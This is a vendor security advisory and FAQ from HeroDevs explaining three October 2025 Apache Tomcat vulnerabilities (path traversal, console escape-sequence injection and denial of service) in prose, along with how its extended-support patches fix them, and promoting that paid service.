Apache Tomcat October 2025 Vulnerabilities: What You Need to Know

In October 2025, three new Apache Tomcat vulnerabilities were disclosed—impacting nearly every major version still in production use.
These include:

• CVE-2025-55752 (Path Traversal)
  
  
• CVE-2025-55754 (Command Injection)
  
  
• CVE-2025-61795 (Denial of Service)
  
  

While each vulnerability targets different parts of Tomcat’s core behavior, the shared thread is risk. For organizations running EOL or unpatched versions, these issues can lead to data exposure, downtime, and potential compliance violations.

HeroDevs’ Never-Ending Support (NES) for Tomcat provides ongoing CVE remediation and fully tested patched binaries—keeping systems secure long after community support ends.

Below, our engineers break down the key questions surrounding these vulnerabilities and how HeroDevs addressed them.

‍

FAQ

What caused the Path Traversal vulnerability (CVE-2025-55752)?

A bugfix for another issue caused a regression in Tomcat’s URL rewrite handling, causing rewritten URLs to be normalized before decoding. This allowed attackers to manipulate request paths to access protected directories such as /WEB-INF/ or /META-INF/.

Could CVE-2025-55752 lead to Remote Code Execution (RCE)?

Potentially. If PUT requests are enabled, attackers could upload malicious files to these directories, leading to RCE under certain configurations. HeroDevs’ patch prevents path normalization from being abused in this way.

How does the NES patch resolve CVE-2025-55752?

HeroDevs’ patch changes the URL rewrite logic so that the query string gets decoded before it gets normalized. This ensures that the application can identify the full correct path being referenced by the request and that security can be applied correctly.

What are URL rewrite rules?

URL rewrite rules are logic in an application that translates one URL into another, leading to cleaner, more user-friendly addresses for users. Rewrite rules are often used to rewrite queryParameters to the URL.

For example, a user might request http://somedomain.com/orders?id=123 and the application may rewrite the URL to http://somedomain.com/orders/123.

What is URL normalization?

URL normalization is the process of converting a URL into a consistent and standardized format to determine if different-looking URLs actually point to the same resource. This is achieved by applying a set of rules, such as converting to lowercase or removing unnecessary parts like default ports or fragment identifiers.

How does the Command Injection vulnerability (CVE-2025-55754) work?

On Windows systems, Tomcat logs to consoles that may interpret ANSI escape sequences. A crafted URL could inject escape codes into those logs, potentially altering console behavior or copying malicious commands to an admin’s clipboard.

It is important to note that an attacker can only manipulate the console and clipboard. A successful attack depends on tricking an operator into running an attacker controlled command.

Are Linux or containerized Tomcat deployments affected by CVE-2025-55754?

No. The issue is specific to Windows consoles that support ANSI escape sequences. Linux and containerized environments are not impacted.

What triggers the Denial of Service vulnerability (CVE-2025-61795)?

Failed multipart file uploads leave temporary files behind faster than the JVM garbage collector can remove them. Under sustained traffic, these residual files can fill disk space and cause outages.

How does the NES patch resolve CVE-2025-61795?

HeroDevs’ patch modifies Tomcat’s cleanup logic to immediately delete temporary copies of uploaded files upon failure, preventing accumulation and resource exhaustion.

Are these issues being fixed by the Apache Software Foundation?

Only in the latest community-supported releases. Older branches (8.5, 9.0, 10.1, and early 11.x) are no longer maintained. HeroDevs NES for Tomcat provides verified patches for those versions.

How quickly does HeroDevs release patches after a new CVE is published?

HeroDevs continuously monitors upstream commits and security advisories. Patches for critical CVEs are typically developed, tested, and released within days of disclosure.

How are NES patches tested before release?

Each patch undergoes regression testing, CVE exploit verification, and compatibility validation to ensure it can be safely dropped into production without requiring code changes.

How do customers receive NES patches?

NES customers receive access to secured release channels containing version-matched binaries and detailed documentation for compliance tracking and deployment.

‍

Summary

These three vulnerabilities demonstrate how even small regressions in established frameworks can have major downstream impact—especially for organizations still running EOL versions.

With HeroDevs NES for Tomcat, enterprises maintain security, stability, and compliance through continuous backported patches, without refactoring or risky upgrades.

Learn more about NES for Tomcat →

‍